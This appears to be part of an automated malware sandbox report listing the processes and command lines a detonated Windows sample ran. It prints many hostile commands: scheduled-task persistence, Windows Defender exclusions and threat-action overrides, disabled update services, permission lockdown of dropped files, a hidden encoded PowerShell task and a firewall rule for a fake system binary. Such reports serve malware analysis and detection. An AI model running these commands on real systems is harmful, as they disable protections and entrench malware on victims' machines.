PID 3608 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\3kC15xy.exe

"C:\Users\Admin\AppData\Local\Temp\3kC15xy.exe"

C:\Users\Admin\AppData\Local\Temp\F78F.exe

C:\Users\Admin\AppData\Local\Temp\F78F.exe

C:\Users\Admin\AppData\Local\Temp\F899.exe

C:\Users\Admin\AppData\Local\Temp\F899.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F9A4.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe

C:\Users\Admin\AppData\Local\Temp\FA41.exe

C:\Users\Admin\AppData\Local\Temp\FA41.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe

C:\Users\Admin\AppData\Local\Temp\FAFE.exe

C:\Users\Admin\AppData\Local\Temp\FAFE.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe

C:\Users\Admin\AppData\Local\Temp\FC66.exe

C:\Users\Admin\AppData\Local\Temp\FC66.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 200

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\9B66.exe

C:\Users\Admin\AppData\Local\Temp\9B66.exe

C:\Users\Admin\AppData\Local\Temp\9F9D.exe

C:\Users\Admin\AppData\Local\Temp\9F9D.exe

C:\Users\Admin\AppData\Local\Temp\A1B2.exe

C:\Users\Admin\AppData\Local\Temp\A1B2.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\kos2.exe

"C:\Users\Admin\AppData\Local\Temp\kos2.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 768

C:\Users\Admin\AppData\Local\Temp\set16.exe

"C:\Users\Admin\AppData\Local\Temp\set16.exe"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\K.exe

"C:\Users\Admin\AppData\Local\Temp\K.exe"

C:\Users\Admin\AppData\Local\Temp\7zSAD14.tmp\Install.exe

.\Install.exe /MKdidA "385119" /S

C:\Users\Admin\AppData\Local\Temp\is-3C37I.tmp\is-67DQ6.tmp

"C:\Users\Admin\AppData\Local\Temp\is-3C37I.tmp\is-67DQ6.tmp" /SL4 $90392 "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1281875 52224

C:\Users\Admin\AppData\Local\Temp\7zSA97A.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -i

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 20

C:\Program Files (x86)\MyBurn\MyBurn.exe

"C:\Program Files (x86)\MyBurn\MyBurn.exe" -s

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 20

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

C:\Users\Admin\AppData\Local\Temp\E572.exe

C:\Users\Admin\AppData\Local\Temp\E572.exe

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gNziQqljd" /SC once /ST 02:55:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Users\Admin\AppData\Local\Temp\EECA.exe

C:\Users\Admin\AppData\Local\Temp\EECA.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gNziQqljd"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

\??\c:\windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1380 -s 580

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gNziQqljd"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 04:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\AMszdPP.exe\" 3Y /Lisite_idfcm 385119 /S" /V1 /F

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\AMszdPP.exe

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\AMszdPP.exe 3Y /Lisite_idfcm 385119 /S

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

